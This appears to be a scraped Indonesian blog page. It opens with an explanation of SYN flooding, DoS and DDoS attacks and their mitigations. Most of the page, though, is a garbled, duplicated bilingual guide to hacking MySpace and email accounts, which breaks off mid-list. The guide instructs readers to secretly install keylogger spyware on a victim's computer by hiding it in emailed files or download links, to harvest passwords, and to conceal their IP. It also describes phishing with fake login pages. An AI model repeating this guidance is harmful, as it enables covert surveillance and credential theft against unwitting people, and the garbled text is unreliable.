Paket-paket SYN adalah salah satu jenis paket dalam protokol Transmission Control Protocol yang dapat digunakan untuk membuat koneksi antara dua host dan dikirimkan oleh host yang hendak membuat koneksi, sebagai langkah pertama pembuatan koneksi dalam proses "TCP Three-way Handshake". Dalam sebuah serangan SYN Flooding, si penyerang akan mengirimkan paket-paket SYN ke dalam port-port yang sedang berada dalam keadaan "Listening" yang berada dalam host target. Normalnya, paket-paket SYN yang dikirimkan berisi alamat sumber yang menunjukkan sistem aktual, tetapi paket-paket SYN dalam serangan ini didesain sedemikian rupa, sehingga paket-paket tersebut memiliki alamat sumber yang tidak menunjukkan sistem aktual. Ketika target menerima paket SYN yang telah dimodifikasi tersebut, target akan merespons dengan sebuah paket SYN/ACK yang ditujukan kepada alamat yang tercantum di dalam SYN Packet yang ia terima (yang berarti sistem tersebut tidak ada secara aktual), dan kemudian akan menunggu paket Acknowledgment (ACK) sebagai balasan untuk melengkapi proses pembuatan koneksi. Tetapi, karena alamat sumber dalam paket SYN yang dikirimkan oleh penyerang tidaklah valid, paket ACK tidak akan pernah datang ke target, dan port yang menjadi target serangan akan menunggu hingga waktu pembuatan koneksi "kadaluwarsa" atau timed-out. Jika sebuah port yang listening tersebut menerima banyak paket-paket SYN, maka port tersebut akan meresponsnya dengan paket SYN/ACK sesuai dengan jumlah paket SYN yang ia dapat menampungnya di dalam buffer yang dialokasikan oleh sistem operasi.
Jumlah percobaan pembuatan koneksi TCP yang dapat ditampung oleh sebuah host di dalam buffer memang berbeda-beda antara satu platform dengan platform lainnya, tapi jumlahnya tidak lebih dari beberapa ratus buah koneksi saja. Dengan mengirimkan banyak paket SYN ke sebuah port yang berada dalam keadaan listening yang berada dalam host target, buffer koneksi yang dialokasikan oleh sistem penerima dapat mengalami "kepenuhan" dan target pun menjadi tidak dapat merespons koneksi yang datang hingga paket SYN yang sebelumnya mengalami "timed-out" atau buffer memiliki ruang tampung yang lebih banyak. Beberapa sistem operasi bahkan dapat mengalami hang ketika buffer koneksi terlalu penuh dan harus di-restart. Baik pe-restart-an ulang sistem operasi atau buffer yang dipenuhi dengan paket SYN yang tidak jelas datangnya dari mana tersebut mengakibatkan pengguna yang valid dalam sebuah jaringan menjadi tidak dapat mengakses layanan-layanan dalam jaringan. Sistem server di mana pengguna hendak mengakses pun menolak request akses dari pengguna.
Ada beberapa cara yang dapat dilakukan untuk mencegah dan mengurangi efek dari SYN Flooding, yakni sebagai berikut:
Meningkatkan ukuran buffer koneksi TCP untuk meningkatkan jumlah percobaan pembuatan koneksi yang dapat dilakukan secara simultan. Hal ini memang menjadi solusi sementara, karena penyerang juga mungkin meningkatkan ukuran paket SYN yang ia kirimkan untuk memenuhi buffer tersebut.
Mengurangi nilai waktu kapan sebuah percobaan pembuatan koneksi TCP menjadi "timed-out". Hal ini juga menjadi solusi sementara, apalagi jika jaringan di mana sistem berada sangat sibuk atau lambat.
Mengimplementasikan penapisan paket yang masuk ke dalam router, sehingga memblokir semua serangan yang menggunakan alamat palsu. Hal ini juga menjadi solusi sementara, karena tidak semua ISP mengimplementasikan fitur seperti ini.
Memantau firewall dan mengonfigurasikannya untuk memblokir serangan SYN flood ketika hal tersebut terjadi. Pendekatan ini merupakan pendekatan yang sering dilakukan oleh banyak organisasi, apalagi jika ditambah dengan Intrusion Prevention System (IPS), meski hal ini membutuhkan kejelian dari seorang administrator jaringan untuk memantau catatan (log) dari IPS dan firewall yang ia atur. Bahkan, dengan kedua perangkat tersebut, klien-klien yang valid dapat ditolaknya karena konfigurasi yang tidak benar.
DDOS
Serangan DoS (Inggris: denial-of-service attacks) adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.
Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:
Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.
Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.
Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.
Distributed Denial of Service (DDoS) atau Penolakan Layanan secara Terdistribusi adalah salah satu jenis serangan Denial of Service yang menggunakan banyak host penyerang (baik itu menggunakan komputer yang didedikasikan untuk melakukan penyerangan atau komputer yang "dipaksa" menjadi zombie) untuk menyerang satu buah host target di jaringan.
Serangan Denial of Service klasik bersifat "satu lawan satu", sehingga dibutuhkan sebuah host yang kuat (baik itu dari kekuatan pemrosesan atau sistem operasinya) demi membanjiri lalu lintas host target sehingga mencegah klien yang valid untuk mengakses layanan jaringan pada server yang dijadikan target serangan. Serangan DDoS ini menggunakan teknik yang lebih canggih dibandingkan dengan serangan Denial of Service yang asli, yakni dengan meningkatkan serangan beberapa kali dengan menggunakan beberapa komputer sekaligus, sehingga dapat mengakibatkan server atau keseluruhan segmen jaringan dapat menjadi "tidak berguna" bagi klien.
Serangan DDoS pertama kali muncul pada tahun 1999, tiga tahun setelah serangan Denial of Service yang asli dengan menggunakan serangan SYN Flooding, yang mengakibatkan beberapa server web di Internet mengalami "downtime". Pada awal Februari 2000, sebuah serangan yang besar dilakukan sehingga beberapa situs web terkenal seperti Amazon, CNN, eBay, dan Yahoo! mengalami "downtime" selama beberapa jam. Serangan yang lebih baru lagi pernah dilancarkan pada bulan Oktober 2002 ketika 9 dari 13 root DNS Server diserang dengan menggunakan DDoS yang sangat besar yang disebut dengan "Ping Flood". Pada puncak serangan, beberapa server-server tersebut pada tiap detiknya mendapatkan lebih dari 150000 request paket Internet Control Message Protocol (ICMP). Untungnya, karena serangan hanya dilakukan selama setengah jam saja, lalu lintas Internet pun tidak terlalu terpengaruh dengan serangan tersebut (setidaknya tidak semuanya mengalami kerusakan).
Tidak seperti akibatnya yang menjadikan kerumitan yang sangat tinggi (bagi para administrator jaringan dan server), teori dan praktek untuk melakukan serangan DDoS justru sederhana, yakni sebagai berikut:
Menjalankan tool yang secara otomatis akan memindai jaringan untuk menemukan host-host yang rentan (vulnerable) yang terkoneksi ke Internet. Setelah host yang rentan ditemukan, tool tersebut dapat menginstalasikan salah satu jenis dari Trojan Horse yang disebut sebagai DDoS Trojan, yang akan mengakibatkan host tersebut menjadi zombie yang dapat dikontrol secara jarak jauh oleh sebuah komputer master yang digunakan oleh si penyerang asli untuk melancarkan serangan. Beberapa tool yang digunakan untuk melakukan serangan serperti ini adalah TFN, TFN2K, Trinoo, dan Stacheldraht, yang dapat diperoleh secara bebas di Internet.
Ketika si penyerang merasa telah mendapatkan jumlah host yang cukup (sebagai zombie) untuk melakukan penyerangan, penyerang akan menggunakan komputer master untuk memberikan sinyal penyerangan terhadap jaringan target atau host target. Serangan ini umumnya dilakukan dengan menggunakan beberapa bentuk SYN Flood atau skema serangan DoS yang sederhana, tapi karena dilakukan oleh banyak host zombie, maka jumlah lalu lintas jaringan yang diciptakan oleh mereka adalah sangat besar, sehingga "memakan habis" semua sumber daya Transmission Control Protocol yang terdapat di dalam komputer atau jaringan target dan dapat mengakibatkan host atau jaringan tersebut mengalami "downtime".
Hampir semua platform komputer dapat dibajak sebagai sebuah zombie untuk melakukan serangan seperti ini. Sistem-sistem populer, semacam Solaris, Linux, Microsoft Windows dan beberapa varian UNIX dapat menjadi zombie, jika memang sistem tersebut atau aplikasi yang berjalan di atasnya memiliki kelemahan yang dieksploitasi oleh penyerang.
Beberapa contoh Serangan DoS lainnya adalah adalah:
Serangan Buffer Overflow, mengirimkan data yang melebihi kapasitas sistim, misalnya paket ICMP yang berukuran sangat besar.
Serangan SYN, mengirimkan data TCP SYN dengan alamat palsu.
Serangan Teardrop, mengirimkan paket IP dengan nilai offsetyang membingungkan.
Serangan Smurf, mengirimkan paket ICMP bervolume besar dengan alamat host lain.
ICMP Flooding
Tuesday, October 20, 2009
Tuesday, October 13, 2009
HACK MY SPACE
MySpace adalah salah satu yang paling banyak digunakan situs Jaringan Sosial oleh banyak remaja dan orang dewasa acropss dunia. I have seen many cheaters create secret Myspace accounts in order to exchange messages with another person and have secret relationships. Saya telah melihat banyak curang membuat account Myspace rahasia untuk bertukar pesan dengan orang lain dan memiliki hubungan rahasia. So, it's no wonder many people want to know how to hack a Myspace account. Jadi, tak heran banyak orang ingin tahu bagaimana meng-hack sebuah account Myspace. In this post you'll fine the real and working ways to hack a Myspace. Dalam posting ini anda akan baik-baik saja dan bekerja nyata cara untuk hack sebuah Myspace.
THINGS YOU SHOULD KNOW BEFORE PROCEEDING HAL YANG PERLU ANDA KETAHUI SEBELUM PROSIDING
With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Myspace: They are Keylogging and Phishing. Dengan pengalaman saya sekitar 6 tahun di bidang IT Hacking dan keamanan, saya dapat memberitahu Anda bahwa hanya ada dua cara untuk hack sebuah Myspace: Mereka keylogging dan Phishing. All the other ways are scams! Here is a list of facts about Myspace hacking. Semua cara-cara lain adalah penipuan! Berikut adalah daftar fakta tentang Myspace hacking.
1. 1. There is no ready made software or program that can hack Myspace just by entering the target username or URL. Tidak ada siap pakai perangkat lunak atau program yang bisa hack Myspace hanya dengan memasukkan nama pengguna target atau URL. If you come accross a site that claims to sell a program to hack Myspace then it's 100% scam. Jika kamu menemukan situs yang mengklaim menjual sebuah program untuk hack Myspace maka itu 100% scam.
2. 2. Never trust any Hacking Service that claims to hack a Myspace account just for $100 or $200. Most of them are scams. Jangan pernah percaya apapun Layanan Hacking yang mengklaim-hack sebuah account Myspace hanya sebesar $ 100 atau $ 200. Kebanyakan dari mereka adalah penipuan.
The following are the only 2 foolproof methods to hack Myspace. Berikut ini adalah sangat mudah hanya 2 metode untuk hack Myspace.
1. How to Hack Myspace – The Easiest Way 1. Cara Hack Myspace - The termudah Way
The easiest way to hack Myspace is by using a keylogger (Spy Software). Cara termudah untuk hack Myspace adalah dengan menggunakan keylogger (Spy Software). It doesn't matter whether or not you have physical access to the target computer. To use a keylogger it doesn't need any technical knowledge. Tidak masalah apakah Anda memiliki akses fisik ke komputer target. Untuk menggunakan keylogger tidak memerlukan pengetahuan teknis apapun. Anyone with a basic knowledge of computers can use keyloggers. Siapa pun yang memiliki pengetahuan dasar mengenai komputer dapat menggunakan keyloggers.
1. 1. What is a keylogger? Apa itu keylogger?
A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer's keyboard. Sebuah keylogger adalah sebuah program kecil yang memonitor setiap keystroke yang diketik pengguna pada keyboard komputer tertentu. A keylogger is also called as a Spy software or Spy program. Sebuah keylogger juga disebut sebagai perangkat lunak atau Spy Spy program.
2. 2. Where is keylogger program available? Di mana program keylogger tersedia?
There exists tons of keyloggers on the internet, but most of them are useless and doesn't turn out to be effective. Ton terdapat keyloggers di internet, tapi kebanyakan dari mereka tidak berguna dan tidak berubah menjadi efektif. But with my experience I recommend the following keylogger as the best to hack Myspce since it supports remote installation. Tapi dengan pengalaman saya saya sarankan keylogger berikut sebagai yang terbaik untuk hack Myspce karena mendukung instalasi terpencil. This can also be used on local computer. Hal ini juga dapat digunakan pada komputer lokal.
SniperSpy SniperSpy
3. 3. How to install a keylogger? Bagaimana menginstal sebuah keylogger?
Keyloggers can be installed just like any other program. Keyloggers dapat diinstal seperti program lain. At the installation time, you need to set your secret password and hotkey combination, to unhide the keylogger program whenever it is needed. Pada saat instalasi, anda perlu untuk mengatur sandi rahasia dan kombinasi hotkey, untuk unhide pada program keylogger kapan pun ia butuhkan. This is because, after installation the keylogger becomes completely invisible and start running in the background. Hal ini karena, setelah instalasi yang keylogger menjadi benar-benar tak terlihat dan mulai berjalan di latar belakang. Because of it's stealth behaviour the victim can never come to know about that the presence of the keylogger software on his/her computer. Karena itu diam-diam perilaku korban tidak pernah bisa datang untuk tahu tentang bahwa kehadiran perangkat lunak keylogger di komputernya.
4. 4. I don't have physical access to the target computer, can I still use Sniperspy? Saya tidak punya akses fisik ke komputer target, apakah saya masih dapat menggunakan Sniperspy?
It doesn't matter whether or not you have physical access to the victim's computer. Tidak masalah apakah Anda memiliki akses fisik ke komputer korban. Because SniperSpy offers Remote Installation Feature . Karena SniperSpy menawarkan Fitur Remote Instalasi. So, you can hack Myspace remotely installing the keylogger on the target PC. Jadi, Anda dapat kembali Myspace jauh menginstal keylogger pada PC target.
You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. Anda dapat memasang keylogger dengan file apa saja seperti image, MS excel file atau program lain dan mengirimkannya ke korban melalui email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. Ketika korban menjalankan file, maka secara otomatis akan mendapatkan diinstal tanpa pengetahuan dan mulai merekam setiap kegiatan di komputernya. The logs containing these activities are sent to you by the keylogger software via email or FTP. Log yang berisi kegiatan-kegiatan ini akan dikirim kepada Anda oleh perangkat lunak keylogger melalui email atau FTP.
5. 5. What is the best way to deploy the keylogger onto remote PC? Apa cara terbaik untuk menyebarkan remote yang keylogger ke PC?
Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com . Alih-alih mengirimkan keylogger sebagai lampiran email, direkomendasikan bahwa Anda menempatkan file dalam .ZIP / .RAR format dan meng-upload ke www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Setelah meng-upload, hanya mengirim link download langsung ke korban melalui email. Once he downloads the file from this link and run it, the keylogger will get installed automatically. Begitu ia mendownload file dari link ini dan menjalankannya, yang keylogger akan terinstal secara otomatis.
6. 6. How can a keylogger hack Myspace account? Bagaimana sebuah keylogger hack account Myspace?
You can hack Myspace using keylogger as follows: You install the keylogger on a Remote PC (or on your local PC). Anda dapat menggunakan keylogger hack Myspace sebagai berikut: Anda menginstal keylogger pada Remote PC (atau pada PC lokal Anda). The victim is unaware of the presence of the keylogger on his computer. Korban tidak menyadari kehadiran keylogger di komputernya. As usual, he logs into his Myspace account by typing the Myspace username and password. Seperti biasa, ia log ke rekening Myspace Myspace dengan mengetikkan username dan password. These details are recorded and sent to your Sniperspy account. Rincian ini dicatat dan dikirim ke account Sniperspy Anda. You can login to your Sniperspy account to see the password. Anda dapat login ke account Sniperspy Anda untuk melihat password. Now you have successfully hacked the Myspace account. Sekarang Anda telah berhasil meng-hack account Myspace.
In case if you install the keylogger on your local PC, you can obtain the recorded Myspace password just by unhiding the keylogger program. Dalam kasus jika Anda menginstal keylogger pada PC lokal Anda, Anda dapat memperoleh Myspace password yang direkam hanya dengan program keylogger unhiding yang.
7. 7. Why SniperSpy is the best? Mengapa SniperSpy adalah yang terbaik?
I have given a complete review of SniperSpy in my new post Which Spy Software to Choose . Aku telah memberikan review lengkap SniperSpy di posting baru Yang Spy Software untuk Pilih. This should answer your question. Ini harus menjawab pertanyaan Anda.
So what are you waiting for? Jadi apa yang Anda tunggu? Go grab it. Go meraihnya.
For a complete installation guide and more information on SniperSpy visit the following link Untuk panduan instalasi lengkap dan informasi lebih lanjut tentang SniperSpy kunjungi link berikut
SniperSpy SniperSpy
NOTE: WHEN YOU USE A KEYLOGGER TO HACK A MYSPACE ACCOUNT IT IS HIGHLY RECOMMENDED TO HIDE YOUR REAL IP ADDRESS. CATATAN: BILA ANDA GUNAKAN UNTUK KeyLogger Hack A MYSPACE ACCOUNT INI SANGAT DISARANKAN UNTUK ANDA SEMBUNYIKAN REAL IP ADDRESS. SO WE RECOMMEND THE FOLLOWING IP HIDING SOFTWARE Jadi kami sarankan BERIKUT IP MENYEMBUNYIKAN SOFTWARE
Hide the IP Menyembunyikan IP
2. How to Hack Myspace – Other Ways 2. Cara Hack Myspace - Cara Lain
Phishing Phishing
Phishing is the most commonly used method to hack MySpace. Phishing adalah metode yang paling umum digunakan untuk hack MySpace. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. Yang paling banyak digunakan teknik phishing adalah penggunaan Fake Login Halaman, juga dikenal sebagai halaman palsu. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc. The victim is fooled to believe the fake Myspace page to be the real one and enter his/her password. Halaman login palsu ini mirip dengan halaman login asli dari situs seperti Yahoo, Gmail, MySpace dll korban tertipu untuk percaya halaman Myspace palsu menjadi nyata dan memasuki / password-nya. But once the user attempts to login through these pages, his/her Myspace login details are stolen away. Tapi begitu pengguna mencoba untuk login melalui halaman-halaman ini, ia / nya rincian login Myspace dicuri pergi.
Popularity: 39% [ ? ] Popularitas: 39% [?]
THINGS YOU SHOULD KNOW BEFORE PROCEEDING HAL YANG PERLU ANDA KETAHUI SEBELUM PROSIDING
With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Myspace: They are Keylogging and Phishing. Dengan pengalaman saya sekitar 6 tahun di bidang IT Hacking dan keamanan, saya dapat memberitahu Anda bahwa hanya ada dua cara untuk hack sebuah Myspace: Mereka keylogging dan Phishing. All the other ways are scams! Here is a list of facts about Myspace hacking. Semua cara-cara lain adalah penipuan! Berikut adalah daftar fakta tentang Myspace hacking.
1. 1. There is no ready made software or program that can hack Myspace just by entering the target username or URL. Tidak ada siap pakai perangkat lunak atau program yang bisa hack Myspace hanya dengan memasukkan nama pengguna target atau URL. If you come accross a site that claims to sell a program to hack Myspace then it's 100% scam. Jika kamu menemukan situs yang mengklaim menjual sebuah program untuk hack Myspace maka itu 100% scam.
2. 2. Never trust any Hacking Service that claims to hack a Myspace account just for $100 or $200. Most of them are scams. Jangan pernah percaya apapun Layanan Hacking yang mengklaim-hack sebuah account Myspace hanya sebesar $ 100 atau $ 200. Kebanyakan dari mereka adalah penipuan.
The following are the only 2 foolproof methods to hack Myspace. Berikut ini adalah sangat mudah hanya 2 metode untuk hack Myspace.
1. How to Hack Myspace – The Easiest Way 1. Cara Hack Myspace - The termudah Way
The easiest way to hack Myspace is by using a keylogger (Spy Software). Cara termudah untuk hack Myspace adalah dengan menggunakan keylogger (Spy Software). It doesn't matter whether or not you have physical access to the target computer. To use a keylogger it doesn't need any technical knowledge. Tidak masalah apakah Anda memiliki akses fisik ke komputer target. Untuk menggunakan keylogger tidak memerlukan pengetahuan teknis apapun. Anyone with a basic knowledge of computers can use keyloggers. Siapa pun yang memiliki pengetahuan dasar mengenai komputer dapat menggunakan keyloggers.
1. 1. What is a keylogger? Apa itu keylogger?
A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer's keyboard. Sebuah keylogger adalah sebuah program kecil yang memonitor setiap keystroke yang diketik pengguna pada keyboard komputer tertentu. A keylogger is also called as a Spy software or Spy program. Sebuah keylogger juga disebut sebagai perangkat lunak atau Spy Spy program.
2. 2. Where is keylogger program available? Di mana program keylogger tersedia?
There exists tons of keyloggers on the internet, but most of them are useless and doesn't turn out to be effective. Ton terdapat keyloggers di internet, tapi kebanyakan dari mereka tidak berguna dan tidak berubah menjadi efektif. But with my experience I recommend the following keylogger as the best to hack Myspce since it supports remote installation. Tapi dengan pengalaman saya saya sarankan keylogger berikut sebagai yang terbaik untuk hack Myspce karena mendukung instalasi terpencil. This can also be used on local computer. Hal ini juga dapat digunakan pada komputer lokal.
SniperSpy SniperSpy
3. 3. How to install a keylogger? Bagaimana menginstal sebuah keylogger?
Keyloggers can be installed just like any other program. Keyloggers dapat diinstal seperti program lain. At the installation time, you need to set your secret password and hotkey combination, to unhide the keylogger program whenever it is needed. Pada saat instalasi, anda perlu untuk mengatur sandi rahasia dan kombinasi hotkey, untuk unhide pada program keylogger kapan pun ia butuhkan. This is because, after installation the keylogger becomes completely invisible and start running in the background. Hal ini karena, setelah instalasi yang keylogger menjadi benar-benar tak terlihat dan mulai berjalan di latar belakang. Because of it's stealth behaviour the victim can never come to know about that the presence of the keylogger software on his/her computer. Karena itu diam-diam perilaku korban tidak pernah bisa datang untuk tahu tentang bahwa kehadiran perangkat lunak keylogger di komputernya.
4. 4. I don't have physical access to the target computer, can I still use Sniperspy? Saya tidak punya akses fisik ke komputer target, apakah saya masih dapat menggunakan Sniperspy?
It doesn't matter whether or not you have physical access to the victim's computer. Tidak masalah apakah Anda memiliki akses fisik ke komputer korban. Because SniperSpy offers Remote Installation Feature . Karena SniperSpy menawarkan Fitur Remote Instalasi. So, you can hack Myspace remotely installing the keylogger on the target PC. Jadi, Anda dapat kembali Myspace jauh menginstal keylogger pada PC target.
You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. Anda dapat memasang keylogger dengan file apa saja seperti image, MS excel file atau program lain dan mengirimkannya ke korban melalui email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. Ketika korban menjalankan file, maka secara otomatis akan mendapatkan diinstal tanpa pengetahuan dan mulai merekam setiap kegiatan di komputernya. The logs containing these activities are sent to you by the keylogger software via email or FTP. Log yang berisi kegiatan-kegiatan ini akan dikirim kepada Anda oleh perangkat lunak keylogger melalui email atau FTP.
5. 5. What is the best way to deploy the keylogger onto remote PC? Apa cara terbaik untuk menyebarkan remote yang keylogger ke PC?
Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com . Alih-alih mengirimkan keylogger sebagai lampiran email, direkomendasikan bahwa Anda menempatkan file dalam .ZIP / .RAR format dan meng-upload ke www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Setelah meng-upload, hanya mengirim link download langsung ke korban melalui email. Once he downloads the file from this link and run it, the keylogger will get installed automatically. Begitu ia mendownload file dari link ini dan menjalankannya, yang keylogger akan terinstal secara otomatis.
6. 6. How can a keylogger hack Myspace account? Bagaimana sebuah keylogger hack account Myspace?
You can hack Myspace using keylogger as follows: You install the keylogger on a Remote PC (or on your local PC). Anda dapat menggunakan keylogger hack Myspace sebagai berikut: Anda menginstal keylogger pada Remote PC (atau pada PC lokal Anda). The victim is unaware of the presence of the keylogger on his computer. Korban tidak menyadari kehadiran keylogger di komputernya. As usual, he logs into his Myspace account by typing the Myspace username and password. Seperti biasa, ia log ke rekening Myspace Myspace dengan mengetikkan username dan password. These details are recorded and sent to your Sniperspy account. Rincian ini dicatat dan dikirim ke account Sniperspy Anda. You can login to your Sniperspy account to see the password. Anda dapat login ke account Sniperspy Anda untuk melihat password. Now you have successfully hacked the Myspace account. Sekarang Anda telah berhasil meng-hack account Myspace.
In case if you install the keylogger on your local PC, you can obtain the recorded Myspace password just by unhiding the keylogger program. Dalam kasus jika Anda menginstal keylogger pada PC lokal Anda, Anda dapat memperoleh Myspace password yang direkam hanya dengan program keylogger unhiding yang.
7. 7. Why SniperSpy is the best? Mengapa SniperSpy adalah yang terbaik?
I have given a complete review of SniperSpy in my new post Which Spy Software to Choose . Aku telah memberikan review lengkap SniperSpy di posting baru Yang Spy Software untuk Pilih. This should answer your question. Ini harus menjawab pertanyaan Anda.
So what are you waiting for? Jadi apa yang Anda tunggu? Go grab it. Go meraihnya.
For a complete installation guide and more information on SniperSpy visit the following link Untuk panduan instalasi lengkap dan informasi lebih lanjut tentang SniperSpy kunjungi link berikut
SniperSpy SniperSpy
NOTE: WHEN YOU USE A KEYLOGGER TO HACK A MYSPACE ACCOUNT IT IS HIGHLY RECOMMENDED TO HIDE YOUR REAL IP ADDRESS. CATATAN: BILA ANDA GUNAKAN UNTUK KeyLogger Hack A MYSPACE ACCOUNT INI SANGAT DISARANKAN UNTUK ANDA SEMBUNYIKAN REAL IP ADDRESS. SO WE RECOMMEND THE FOLLOWING IP HIDING SOFTWARE Jadi kami sarankan BERIKUT IP MENYEMBUNYIKAN SOFTWARE
Hide the IP Menyembunyikan IP
2. How to Hack Myspace – Other Ways 2. Cara Hack Myspace - Cara Lain
Phishing Phishing
Phishing is the most commonly used method to hack MySpace. Phishing adalah metode yang paling umum digunakan untuk hack MySpace. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. Yang paling banyak digunakan teknik phishing adalah penggunaan Fake Login Halaman, juga dikenal sebagai halaman palsu. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc. The victim is fooled to believe the fake Myspace page to be the real one and enter his/her password. Halaman login palsu ini mirip dengan halaman login asli dari situs seperti Yahoo, Gmail, MySpace dll korban tertipu untuk percaya halaman Myspace palsu menjadi nyata dan memasuki / password-nya. But once the user attempts to login through these pages, his/her Myspace login details are stolen away. Tapi begitu pengguna mencoba untuk login melalui halaman-halaman ini, ia / nya rincian login Myspace dicuri pergi.
Popularity: 39% [ ? ] Popularitas: 39% [?]
Cara Hack Account Email
Pertanyaan yang paling sering ditanyakan oleh banyak orang khususnya di chat room adalah Cara Hack Account Email? Jadi, Anda sebagai pembaca kemungkinan besar membaca ini karena Anda ingin kembali ke beberapa account email seseorang. Most of the sites on the internet teach you some nonsense and outdated tricks to hack an email. Sebagian besar situs di internet mengajarkan beberapa omong kosong dan ketinggalan zaman trik untuk hack email. But here are some of the real and working ways that can be used to hack an email account. Tapi di sini adalah beberapa kerja nyata dan cara-cara yang dapat digunakan untuk hack account email.
THINGS YOU SHOULD KNOW BEFORE PROCEEDING HAL YANG PERLU ANDA KETAHUI SEBELUM PROSIDING
Before you learn the real ways to hack an email, the following are the things you should be aware of. Sebelum Anda mempelajari cara-cara nyata untuk hack email, berikut adalah hal-hal yang Anda harus sadar.
1. 1. There is no ready made software that can hack emails just with a click of a button. Please don't waste your money on such scam softwares. Ada software yang siap pakai bisa hack email hanya dengan sekali klik tombol. Tolong jangan menyia-nyiakan uang Anda pada penipuan seperti softwares.
2. Never trust any hacking services that claims to hack email passwords just for $100 or $200. 2. Jangan pernah percaya apapun layanan hacking yang mengklaim hack email password hanya sebesar $ 100 atau $ 200. Often people get fooled by these services and eventually loose their money with no gain. Sering kali orang bisa tertipu oleh layanan ini dan akhirnya kehilangan uang mereka tanpa keuntungan.
3. 3. With my experience of over 6 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods to hack an email. Dengan pengalaman saya selama 6 tahun di bidang Hacking dan Keamanan, saya dapat memberitahu Anda bahwa terdapat hanya 2 metode sangat mudah untuk hack email. All the other methods are simply scam or don't work. Semua metode lain hanyalah scam atau tidak bekerja. The following are the only 2 foolproof methods that work. Berikut ini adalah hanya 2 metode yang sangat mudah bekerja.
1. 1. EASIEST WAY TO HACK AN EMAIL ACCOUNT Cara termudah untuk Hack AN EMAIL ACCOUNT
Today, with the advent of a program called Keylogger it's just a cakewalk to hack an email account. Hari ini, dengan munculnya sebuah program bernama Keylogger it's just a cakewalk-hack account email. It doesn't matter whether or not you have physical access to the victim's computer. Using a keylogger is the easiest way to hack an email account . Tidak masalah apakah Anda memiliki akses fisik ke komputer korban. Menggunakan keylogger adalah cara termudah untuk hack account email. Any one with a basic knowledge of computer can use the keylogger and within few hours you can hack any email account. Setiap orang dengan pengetahuan dasar tentang komputer dapat menggunakan keylogger dan dalam beberapa jam Anda dapat hack account email apapun.
1. 1. What is a keylogger? Apa itu keylogger?
A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a small program that monitors each keystroke a user types on a specific computer's keyboard. Sebuah keylogger, kadang-kadang disebut keystroke logger, key logger, atau sistem monitor, adalah sebuah program kecil yang memonitor setiap keystroke pengguna mengetik pada keyboard komputer tertentu. Using a keylogger is the easiest way to hack an email account. Menggunakan keylogger adalah cara termudah untuk hack account email. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim's password. Sebuah program keylogger dapat diinstal hanya dalam beberapa detik dan sekali terinstal, anda hanya satu langkah menjauh dari mendapatkan password korban.
2. 2. Where is the keylogger program available? Dimana program keylogger tersedia?
A keylogger program is widely available on the internet. Some of the best ones are listed below Sebuah program keylogger tersedia secara luas di internet. Beberapa yang terbaik tercantum di bawah ini
SniperSpy SniperSpy
Win-Spy Win-Spy
3. 3. How to install it? Bagaimana cara menginstalnya?
